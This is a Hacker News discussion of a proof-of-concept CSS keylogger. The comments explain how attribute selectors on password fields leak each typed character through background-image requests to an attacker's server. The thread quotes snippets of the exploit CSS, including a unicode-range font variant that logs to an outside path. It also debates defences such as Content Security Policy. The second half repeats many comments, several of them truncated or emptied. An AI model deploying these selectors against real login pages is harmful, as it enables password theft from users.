Show HN: A CSS Keylogger (opens in new tab)

criswell8y ago

Hopefully most are updating the property and not the attribute.

blablabla1238y ago

Maybe they will have to rethink it. It seemed odd when they introduced it and at least in the early React version kept making problems e.g. when entering German Umlaute on US keyboards. Not working much on Frontend anymore but when I do inputs, I only use uncontrolled ones - it's much less hassle and more flexible anyways.

djsumdog8y ago

So with frameworks like React/Vue, every change to a field generates a request? Or are those handled locally in the shadow dom?

akincisor8y ago

I think it would work against password managers like LastPass which fill in passwords using JS.

criswell8y ago

It would only give you the last character of the password though. You can use CSS selectors to check the start [value^=a] and anything in the middle [value*=a] as well though which can be revealing I imagine.

bzbarsky8y ago

Not if they do it correctly (by setting .value on the password field)!

Is there even a use case where CSS needs to read any field's value? (Checkboxes and radio buttons have :checked.)

kodablah8y ago

It's about the selector, so the question should be rephrased to "Is there even a use case where CSS needs to select a node based on any field's value?". I think the answer is yes, but it can be limited. But it can become annoying to have a blacklist of attributes that aren't allowed to be selected on.

jakobegger8y ago

Something like conditional formatting maybe? Eg. make negative values red?

Make an input field red when it contains an invalid character?

[0] https://developer.mozilla.org/en-US/docs/Web/CSS/Attribute_s...

magnat8y ago

It might be useful to show/hide certain parts of the form depending on a value selected in dropdown (SELECT) control. As for text input controls - perhaps to highlight the content when value matches expected (but not required) pattern.

xab98y ago

it's an attribute matcher, the fact that value is an attribute (or prop or whatever, I don't care) is just sugar

maxchehabOP8y ago

Author here. I believe the injection of the css in the chrome extension will only work in newer versions of chrome. However the "attack" would still work for all browsers. :)

Manishearth8y ago

This is incorrect.

The [value=foo] selector does not work for the actual value of the field, only the `value` attribute (used to set the initial value).

This means that both:

- typing the password

- setting the password via element.value=foo

will not work

The only thing that will hit this is setting the attribute via element.setAttribute("value", "foo"), and this will not update the password. It seems like React does this for whatever reason, though.

xab98y ago

Nice job. Css had similar attacks maybe a decade ago, with link:visited (referer snooping) and image with src to a logged in site... but I like the selector trick.

Extensions are a huge attack vector, but as long as one can't turn them off on a per domain basis, I'm convinced that the browsers just don't give a damn.

dclowd99018y ago

So wouldn't that mean, then, that your CSS matchers would have to contain absolutely every permutation of text possible?

jaymzcampbell8y ago

The CSS attribute selector matches against the character at the end of the word [0], so you just need a-z, 0-9 etc and not their permutations. From the end of the readme there's this example:

    input[type="password"][value$="a"] {
      background-image: url("http://localhost:3000/a");
    }

dmitrygr8y ago

No, since it matches only the last character, you watch the requests it makes IN order to get the entire password. As you type "qwerty", it will request "Q", "W", "E", "R", "T", and finally "Y"

no permutations needed

arca_vorago8y ago

One more reason to hate javascript as used and abused by modern "webdevs" and block it all unless absolutely necessary. I try very hard to keep my pages pure css and html.

phoenix6168y ago

Yeah, I have JavaScript disabled by default with uMatrix and it's a pretty annoying trend that almost every second page — even a static one page site — needs JavaScript to display anything

kakarot8y ago

I try very hard to keep my pages pure css and html.

That's cool, but you obviously have different requirements for the pages you build, and likely aren't in the SPA space, so your better-than-thou outlook doesn't apply.

elliotec8y ago

...What?

AndrewStephens8y ago· 13 in thread

This is neat but doesn't really work as an attack.

The CSS selectors work on the value HtmlNode attribute rather than the Javascript "value" value, which aren't linked normally. The Instagram password field mentioned in the readme.md DOES work this way due to some custom javascript, for reasons that escape me.

[edit] Other people pointed this out first.

Also, if you are going to all the trouble of making an extension to inject your evil CSS into a page, why not go the whole hog and inject evil ecmascript instead?

lambda8y ago

> Also, if you are going to all the trouble of making an extension to inject your evil CSS into a page, why not go the whole hog and inject evil ecmascript instead?

That may just be for the proof of concept.

There are websites which allow users to customize themes of certain pages; such at Tumblr and Reddit. I believe these allow custom CSS. There are probably plenty of other places where it may be possible to inject CSS but not JavaScript.

So, it's worth demonstrating the vulnerability, even if the current way of distributing it only really makes sense for testing purposes.

slig8y ago

> The Instagram password field mentioned in the readme.md DOES work this way due to some custom javascript, for reasons that escape me

Instagram is a React app and React works that way.

AndrewStephens8y ago

Thanks, always nice to hear from somebody who knows something. So this seem like a flaw in React rather than a flaw in browsers - there is no reason to leak the typed-in password value into the the value attribute where CSS can get its' grubby mitts on it.

bfrydl8y ago

React doesn't work that way. It's a convention which I persoally have always found questionable.

moojd8y ago

I could see this being an issue on sites that allow custom css (reddit)

fareesh8y ago

The combination of the two prerequisite conditions is probably tiny. JS needs to update the css accessible value attribute of the field as well. That's a less likely situation. I guess anything that's react + this auth method + custom CSS is vulnerable. Can't think of anything that does all three.

All you need is a website with a vulnerable password form and the ability to serve malicious CSS, say, via an ad. Seems pretty dangerous to me.

xab98y ago

Because of access levels. You may install an extension that requires no access to anything interesting (hey it's just harmless css), but may refuse to install something that wants to read your dom.

Another fun thing: user css / theme extensions where you only install themes. Themes are not dangerous, are they? It's just eyecandy.

humblebee8y ago

> The Instagram password field mentioned in the readme.md DOES work this way due to some custom javascript, for reasons that escape me.

React.

AntonyGarand8y ago

Firewalls blocking javascript would let this pass, NoScript users would get their info stolen, CSS injection vulnerabilities may not allow a XSS as well.

If you do control the page, there may not be that many reasons, but if you only have a limited entry-point, this is very interesting.

maxchehabOP8y ago

Javascript can be blocked from chrome extensions. In fact, Instagram does block javascript. However, clearly css is not blocked.

bfred_it8y ago

What do you mean by "Instagram does block javascript"? What JS does it block?

xab98y ago

You can't event get a list of extensions installed (from a page), but please do tell. You mean generic blocking via CSP/HSTS?

jandrese8y ago· 6 in thread

CSS has gone too far. At least when I'm worried about a nasty javascript attack from a site I can be somewhat reassured that noscript/umatrix will work. Am I going to have to start whitelisting CSS now too? Am I too late?

Raphmedia8y ago

You are. CSS has gone "too far" the second it allowed linking to images.

I can simply background-image:url("myTrackingPixel.png") and then track whenever someone tries to load that image from my server.

jandrese8y ago

It drives me crazy when I see someone has implemented Doom in CSS, but it still requires black magic to do a simple responsive three column layout without using bleeding edge features that aren't widely supported yet.

Manishearth8y ago

This isn't a CSS feature, CSS does not let you select on the value of a password field (it lets you select on the value of the `value` attribute, which doesn't change when you type)

This is a React feature, where React apps specifically use the value attribute (`element.setAttribute("value", ...)`) to set the value, instead of `element.value`.

ry_ry8y ago

Or if that attribute was populated via props from it's parent, which is a more common implementation.

vlunkr8y ago

As other comments have stated, this only works if the 'value' attr is being set on the input box as you type (which React will do), so it still requires JS.

rocqua8y ago

There are a lot of sites where you wouldn't need to inject the JS code for react though.

tritium8y ago· 4 in thread

To be really dangerous, I think this would need to defeat client-side cache strategies. If the browser caches each resource, the server-side reads wouldn't account for repeated characters or overall length with perfect accuracy. Consider palindromes like "racecar."

This would still put many, if not most, passwords within guessable striking distance, for anyone able to intercept plain-text HTTP traffic, between Alice (the client) and Bob (the CSS image resource server).

Keylogger server response can recommend the browser not to cache.

alasdair_8y ago

The server just returns a 400, causing the browser to no longer cache it.

tritium8y ago

True! And now I’m realizing, depending on position in the network, the server doen’t even need to exist, if one only needed to MITM the request traffic... Geeze.

https://jsfiddle.net/tdwsw6zo/3/

This might need to defeat backspace, too.

Raphmedia8y ago· 4 in thread

I can't seem to make it work from a web page. Perhaps it's for extensions only?

rickdmer8y ago

The input has to have the "value" set in the HTML. https://jsfiddle.net/tdwsw6zo/4/

Karawebnetwork8y ago

Well, yes of course but that's simply an attribute selector parsing the raw HTML.

This can be done with any attribute:

input[type="password"][hackernews$="isthebestwebsite"] { background-image: url("http://placehold.it/15x15?text=h4x0r"); }

That's not a keylogger at all, the data is already printed in the HTML source.

maxchehabOP8y ago

Your background-image url must be an endpoint that can process a request. Simply, requesting a placehold.it/a image is pointless, but sending to l33thacker.com/a, assuming that l33thacker.com knows how to process that request maliciously, will work.

Raphmedia8y ago

But you would still see the network call to placehold.it/ if it actually worked.

https://www.mike-gualtieri.com/posts/stealing-data-with-css-...

commandlinefan8y ago· 4 in thread

ALWAYS browse with devtools open, and pay close attention to every packet that's being sent out (especially when you're not expecting any to...)

saagarjha8y ago

This isn't practical at all. Many websites perform hundreds of requests.

commandlinefan8y ago

Not while I'm sitting around not doing anything, at least not normally. Gmail refreshes itself every few seconds, but I'd be awfully suspicious if I started seeing a single packet being transmitted each time I typed a character into a password box.

booleandilemma8y ago

I can’t tell my parents to do that though.

quickthrower28y ago

That's not enough if you are using an online crypto wallet. You also need to check if the seeding is deterministic. And also it could send the data 'later' when you next visit the site rather than now, storing it in indexeddb/localstorage/ etc. So you have a false sense of security.

Also as in this example loading a .jpg could be a way of communicating something.

sachleen8y ago· 3 in thread

You'd have to have all permutations of any length password in the css file AND it would have to be pre-filled using the value attribute.

The original post on this talks about it in more detail:

Summary: A method is detailed - dubbed CSS Exfil - which can be used to steal targeted data using Cascading Style Sheets (CSS) as an attack vector. Due to the modern web's heavy reliance on CSS, a wide variety of data is potentially at risk, including: usernames, passwords, and sensitive data such as date of birth, social security numbers, and credit card numbers. The technique can also be used to de-anonymize users on dark nets like Tor. Defense methods are discussed for both website operators as well as web users, and a pair of browser extensions are offered which guard against this class of attack.

jaymzcampbell8y ago

It is using an attribute selector that matches against the last character only - so no giant file of permutations required.

hughes8y ago

Also, and critically, the server always responds with an HTTP 400 status code. This prevents caching in most browsers, so the request will be made again when a key is repeated.

bfred_it8y ago

In short: this works when the SERVER returns a page with pre-entered information.

This is common when returning to a form you previously filled, like an address for, but it's very, very rare for this to happen to a password field. Like, why would a server send you a password field with your real password pre-entered?

Every other type of data is fair game... given that the attacker can inject CSS into your pages.

wuyishan8y ago· 3 in thread

Couldn't Content Security Policy (CSP) [1] be used to mitigate this attack?

[1]: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

maxchehabOP8y ago

It actually can't. Instagram does use this protect java-script injection from extensions, but clearly injecting CSS is allowed.

sbarre8y ago

But could you use CSP to block the image loading that happens in the CSS with 'img-src' definitions?

Someone else in this thread suggested that as well.

151558y ago

The requested resource, however, could be blocked by a CSP.

orliesaurus8y ago· 3 in thread

Why do you have to activate the extension before entering the password?

guntars8y ago

Probably to add the css file to the page you're on.

okanesen8y ago

So you can test the "exploit" obviously.

orliesaurus8y ago

yes obviously, but in a real world scenario how would that work? Malicious extension loads the CSS file in my current tab and sniffs my password on the attacker's server? Can Chrome extensions load CSS without me having to click/activate them?

[1] https://github.com/jbtronics/CrookedStyleSheets/issues/24 [2] https://news.ycombinator.com/item?id=16157773

myfonj8y ago· 2 in thread

To some limited degree (you can detect presence, not position or number of occurences of character), you can do CSS only 'keylogging' even for non-reactive (sans JavaScript) input: you don't have to use attribute selector (which does't work without physical updates), but can exploit webfont with single letter `unicode-range` chunks. Posted it [1] to CrookedStyleSheets [2] some time ago:

    <!doctype html>
    <title>css keylogger</title>
    <style>
    @font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
    @font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
    @font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
    @font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
    input { font-family: x, 'Comic sans ms'; }
    </style>
    <input value="a">type `bcd` and watch network log

Manishearth8y ago

This will not work with password fields.

sachleen8y ago

Then there's always this: https://www.troyhunt.com/bypassing-browser-security-warnings...

teilo8y ago· 2 in thread

This has nothing to do with vulnerabilities in CSS or Javascript. It has to do with ill-conceived authentication implementations, written in Javascript, that save passwords in the DOM using attributes that are then accessible via CSS. That is a vulnerability on the website itself. It is also an idiotic thing to do.

blixt8y ago

I wouldn't be so dismissive about this. It doesn't really matter what bucket this security issue falls under. It also doesn't change much whether it's "idiotic" or not.

The fact remains that the coding practices on a website used by about a billion people open up for part 1 of this vulnerability (these CSS styles on Instagram do load external resources as you type), and there are plenty of ways for part 2 (inject the CSS) to occur on many less well maintained sites.

Buge8y ago

Even if the site doesn't use javascript to update the DOM, it's still vulnerable to similar attacks [0]. The real problem that the attacks relies on is the ability to inject CSS that can load external resources. And Instagram doesn't allow that.

[0] https://news.ycombinator.com/item?id=16427394

Kequc8y ago· 2 in thread

This exploit might be defeated with the following css:

input[type="password"] { background-image: none !important; }

And if the exploit uses `!important` then you just need to make your selector more specific such as putting it inside an id. If you have malicious javascript running on your page there are better ways to steal data. I feel there is low risk of coming across this problem in the wild.

Illniyar8y ago

Actually if you use inline style with important there is no way to override it.

I.e. <input type="password" style="background-image:none !important"/>

ry_ry8y ago

Although that does rely on targeting that specific attribute. There are probably a handful of ways to trigger an http request in this instance.

You don't actually even need to select that specific node - whilst you can't use :after on replaced elements, if the input has a sibling an attacker could input[type="password"] + div:after or something along those lines.

The main takeaway for me is that making a password field a controlled component is a marginal security risk in some instances, and letting people pump their own styles into sign-in pages is a bad idea.

paxy8y ago· 2 in thread

Can't Chrome extensions already intercept network traffic though? Why does this need to be done at the CSS level?

rocqua8y ago

Chrome extensions are used here as the method for injecting CSS, but there are other possible ways to inject such CSS.

e.g. ads.

ktpsns8y ago

This is a very good question. The github project README does not say anything about the issue with the extensions. Does it also work in a regular page? Weird.

moeadham8y ago· 2 in thread

I hate the internet.

slantaclaus8y ago

You should try the cloud it works way better

1: https://reactjs.org/docs/uncontrolled-components.html

B1FF_PSUVM8y ago

The internet was OK, it's the web that broke bad.

(Truth to tell, advertisers had their fangs on even the barest 'social media' thing like Usenet, where "spam" not in a tin can was first defined.)

fiatjaf8y ago· 1 in thread

Why not

  input[type="password"] {
    background-image: url(attr(value));
  }

?

bfred_it8y ago

url(attr(...)) isn't supported by any browser yet, AFAIK

javajosh8y ago· 1 in thread

Interestingly, you can defeat this key logger by typing the last character first, use the arrow key to go left and type in the rest. This works because the CSS selector only matches the end of the value input.

spyder8y ago

yea, and also when copy-pasting the password.

danschumann8y ago

I've been noticing a lot of CSP talk lately, how CSP is the end-all be-all solution for lots of these types of attacks. Makes me think we should have more articles about how to properly implement a CSP! (content security policy-prevents requests to websites not on the white-list -- the background image request would be rejected)

bfred_it8y ago

No it does not. CSS selectors do not apply to input content and `[value]` selectors apply to attributes, which are not updated by just typing in it.

This is not a CSS keylogger if you need to update the attributes with the input value via JS.

Edit: this apparently works on React sites because React seems to update the `value` attribute as well. Maybe that should be fixed as it’s unnecessary.

vbezhenar8y ago

I wonder if it's possible to make auto-updating CSS. CSS can use @import url("another.css"), and "another.css" might be returned with delay and import "another2.css", but I'm not sure if browser would process current css before it'll import everything.

If this would work, it could spy even without React. Detect first character, then server returns next CSS to detect second character and so on.

twhb8y ago

This isn’t a problem. CSS could already control what’s displayed and what effect it has. It could already make clicking “next page” open an invisible chat to their account, your password box send your password as a message, and your message from a friend read anything they want. It’s always been a trusted asset.

What might be a problem is developers not treating it as such.

jlg238y ago

I have not tried it, but if it works (it should): Chapeau, a very neat exploit indeed.

sexy_seedbox8y ago

One way of mitigating this is to have strong passwords NOT in alphanumeric characters (if allowed by website), such as mixing emojis with Asian characters.

fareesh8y ago

Reminds me of meltdown. Pretty neat.

j / k navigate · click thread line to collapse

168 comments

98 comments · 23 top-level

rickdmer8y ago· 23 in thread

Hmm, that's pretty bad. CSS probably shouldn't be able to read password inputs.

Edit: This doesn't seem to work for me in Chrome 63.0.3239.132

oblosys8y ago

If you use React, updating the value on every change is a very common pattern.

enobrev8y ago

criswell8y ago

Hopefully most are updating the property and not the attribute.

blablabla1238y ago

djsumdog8y ago

So with frameworks like React/Vue, every change to a field generates a request? Or are those handled locally in the shadow dom?

akincisor8y ago

I think it would work against password managers like LastPass which fill in passwords using JS.

criswell8y ago

bzbarsky8y ago

Not if they do it correctly (by setting .value on the password field)!

Is there even a use case where CSS needs to read any field's value? (Checkboxes and radio buttons have :checked.)

kodablah8y ago

jakobegger8y ago

Something like conditional formatting maybe? Eg. make negative values red?

Make an input field red when it contains an invalid character?

[0] https://developer.mozilla.org/en-US/docs/Web/CSS/Attribute_s...

magnat8y ago

xab98y ago

it's an attribute matcher, the fact that value is an attribute (or prop or whatever, I don't care) is just sugar

maxchehabOP8y ago

Author here. I believe the injection of the css in the chrome extension will only work in newer versions of chrome. However the "attack" would still work for all browsers. :)

Manishearth8y ago

This is incorrect.

The [value=foo] selector does not work for the actual value of the field, only the `value` attribute (used to set the initial value).

This means that both:

- typing the password

- setting the password via element.value=foo

will not work

The only thing that will hit this is setting the attribute via element.setAttribute("value", "foo"), and this will not update the password. It seems like React does this for whatever reason, though.

xab98y ago

Nice job. Css had similar attacks maybe a decade ago, with link:visited (referer snooping) and image with src to a logged in site... but I like the selector trick.

Extensions are a huge attack vector, but as long as one can't turn them off on a per domain basis, I'm convinced that the browsers just don't give a damn.

dclowd99018y ago

So wouldn't that mean, then, that your CSS matchers would have to contain absolutely every permutation of text possible?

jaymzcampbell8y ago

The CSS attribute selector matches against the character at the end of the word [0], so you just need a-z, 0-9 etc and not their permutations. From the end of the readme there's this example:

    input[type="password"][value$="a"] {
      background-image: url("http://localhost:3000/a");
    }

dmitrygr8y ago

No, since it matches only the last character, you watch the requests it makes IN order to get the entire password. As you type "qwerty", it will request "Q", "W", "E", "R", "T", and finally "Y"

no permutations needed

arca_vorago8y ago

One more reason to hate javascript as used and abused by modern "webdevs" and block it all unless absolutely necessary. I try very hard to keep my pages pure css and html.

phoenix6168y ago

Yeah, I have JavaScript disabled by default with uMatrix and it's a pretty annoying trend that almost every second page — even a static one page site — needs JavaScript to display anything

kakarot8y ago

I try very hard to keep my pages pure css and html.

That's cool, but you obviously have different requirements for the pages you build, and likely aren't in the SPA space, so your better-than-thou outlook doesn't apply.

elliotec8y ago

...What?

AndrewStephens8y ago· 13 in thread

This is neat but doesn't really work as an attack.

[edit] Other people pointed this out first.

Also, if you are going to all the trouble of making an extension to inject your evil CSS into a page, why not go the whole hog and inject evil ecmascript instead?

lambda8y ago

> Also, if you are going to all the trouble of making an extension to inject your evil CSS into a page, why not go the whole hog and inject evil ecmascript instead?

That may just be for the proof of concept.

So, it's worth demonstrating the vulnerability, even if the current way of distributing it only really makes sense for testing purposes.

slig8y ago

> The Instagram password field mentioned in the readme.md DOES work this way due to some custom javascript, for reasons that escape me

Instagram is a React app and React works that way.

AndrewStephens8y ago

bfrydl8y ago

React doesn't work that way. It's a convention which I persoally have always found questionable.

moojd8y ago

I could see this being an issue on sites that allow custom css (reddit)

fareesh8y ago

All you need is a website with a vulnerable password form and the ability to serve malicious CSS, say, via an ad. Seems pretty dangerous to me.

xab98y ago

Because of access levels. You may install an extension that requires no access to anything interesting (hey it's just harmless css), but may refuse to install something that wants to read your dom.

Another fun thing: user css / theme extensions where you only install themes. Themes are not dangerous, are they? It's just eyecandy.

humblebee8y ago

> The Instagram password field mentioned in the readme.md DOES work this way due to some custom javascript, for reasons that escape me.

React.

AntonyGarand8y ago

Firewalls blocking javascript would let this pass, NoScript users would get their info stolen, CSS injection vulnerabilities may not allow a XSS as well.

If you do control the page, there may not be that many reasons, but if you only have a limited entry-point, this is very interesting.

maxchehabOP8y ago

Javascript can be blocked from chrome extensions. In fact, Instagram does block javascript. However, clearly css is not blocked.

bfred_it8y ago

What do you mean by "Instagram does block javascript"? What JS does it block?

xab98y ago

You can't event get a list of extensions installed (from a page), but please do tell. You mean generic blocking via CSP/HSTS?

jandrese8y ago· 6 in thread

Raphmedia8y ago

You are. CSS has gone "too far" the second it allowed linking to images.

I can simply background-image:url("myTrackingPixel.png") and then track whenever someone tries to load that image from my server.

jandrese8y ago

Manishearth8y ago

This isn't a CSS feature, CSS does not let you select on the value of a password field (it lets you select on the value of the `value` attribute, which doesn't change when you type)

This is a React feature, where React apps specifically use the value attribute (`element.setAttribute("value", ...)`) to set the value, instead of `element.value`.

ry_ry8y ago

Or if that attribute was populated via props from it's parent, which is a more common implementation.

vlunkr8y ago

As other comments have stated, this only works if the 'value' attr is being set on the input box as you type (which React will do), so it still requires JS.

rocqua8y ago

There are a lot of sites where you wouldn't need to inject the JS code for react though.

tritium8y ago· 4 in thread

Keylogger server response can recommend the browser not to cache.

alasdair_8y ago

The server just returns a 400, causing the browser to no longer cache it.

tritium8y ago

True! And now I’m realizing, depending on position in the network, the server doen’t even need to exist, if one only needed to MITM the request traffic... Geeze.

https://jsfiddle.net/tdwsw6zo/3/

This might need to defeat backspace, too.

Raphmedia8y ago· 4 in thread

I can't seem to make it work from a web page. Perhaps it's for extensions only?

rickdmer8y ago

The input has to have the "value" set in the HTML. https://jsfiddle.net/tdwsw6zo/4/

Karawebnetwork8y ago

Well, yes of course but that's simply an attribute selector parsing the raw HTML.

This can be done with any attribute:

input[type="password"][hackernews$="isthebestwebsite"] { background-image: url("http://placehold.it/15x15?text=h4x0r"); }

That's not a keylogger at all, the data is already printed in the HTML source.

maxchehabOP8y ago

Raphmedia8y ago

But you would still see the network call to placehold.it/ if it actually worked.

https://www.mike-gualtieri.com/posts/stealing-data-with-css-...

commandlinefan8y ago· 4 in thread

ALWAYS browse with devtools open, and pay close attention to every packet that's being sent out (especially when you're not expecting any to...)

saagarjha8y ago

This isn't practical at all. Many websites perform hundreds of requests.

commandlinefan8y ago

booleandilemma8y ago

I can’t tell my parents to do that though.

quickthrower28y ago

Also as in this example loading a .jpg could be a way of communicating something.

sachleen8y ago· 3 in thread

You'd have to have all permutations of any length password in the css file AND it would have to be pre-filled using the value attribute.

The original post on this talks about it in more detail:

jaymzcampbell8y ago

It is using an attribute selector that matches against the last character only - so no giant file of permutations required.

hughes8y ago

Also, and critically, the server always responds with an HTTP 400 status code. This prevents caching in most browsers, so the request will be made again when a key is repeated.

bfred_it8y ago

In short: this works when the SERVER returns a page with pre-entered information.

Every other type of data is fair game... given that the attacker can inject CSS into your pages.

wuyishan8y ago· 3 in thread

Couldn't Content Security Policy (CSP) [1] be used to mitigate this attack?

[1]: https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

maxchehabOP8y ago

It actually can't. Instagram does use this protect java-script injection from extensions, but clearly injecting CSS is allowed.

sbarre8y ago

But could you use CSP to block the image loading that happens in the CSS with 'img-src' definitions?

Someone else in this thread suggested that as well.

151558y ago

The requested resource, however, could be blocked by a CSP.

orliesaurus8y ago· 3 in thread

Why do you have to activate the extension before entering the password?

guntars8y ago

Probably to add the css file to the page you're on.

okanesen8y ago

So you can test the "exploit" obviously.

orliesaurus8y ago

[1] https://github.com/jbtronics/CrookedStyleSheets/issues/24 [2] https://news.ycombinator.com/item?id=16157773

myfonj8y ago· 2 in thread

    <!doctype html>
    <title>css keylogger</title>
    <style>
    @font-face { font-family: x; src: url(./log?a), local(Impact); unicode-range: U+61; }
    @font-face { font-family: x; src: url(./log?b), local(Impact); unicode-range: U+62; }
    @font-face { font-family: x; src: url(./log?c), local(Impact); unicode-range: U+63; }
    @font-face { font-family: x; src: url(./log?d), local(Impact); unicode-range: U+64; }
    input { font-family: x, 'Comic sans ms'; }
    </style>
    <input value="a">type `bcd` and watch network log

Manishearth8y ago

This will not work with password fields.

sachleen8y ago

Then there's always this: https://www.troyhunt.com/bypassing-browser-security-warnings...

teilo8y ago· 2 in thread

blixt8y ago

I wouldn't be so dismissive about this. It doesn't really matter what bucket this security issue falls under. It also doesn't change much whether it's "idiotic" or not.

Buge8y ago

[0] https://news.ycombinator.com/item?id=16427394

Kequc8y ago· 2 in thread

This exploit might be defeated with the following css:

input[type="password"] { background-image: none !important; }

Illniyar8y ago

Actually if you use inline style with important there is no way to override it.

I.e. <input type="password" style="background-image:none !important"/>

ry_ry8y ago

Although that does rely on targeting that specific attribute. There are probably a handful of ways to trigger an http request in this instance.

paxy8y ago· 2 in thread

Can't Chrome extensions already intercept network traffic though? Why does this need to be done at the CSS level?

rocqua8y ago

Chrome extensions are used here as the method for injecting CSS, but there are other possible ways to inject such CSS.

e.g. ads.

ktpsns8y ago

This is a very good question. The github project README does not say anything about the issue with the extensions. Does it also work in a regular page? Weird.

moeadham8y ago· 2 in thread

I hate the internet.

slantaclaus8y ago

You should try the cloud it works way better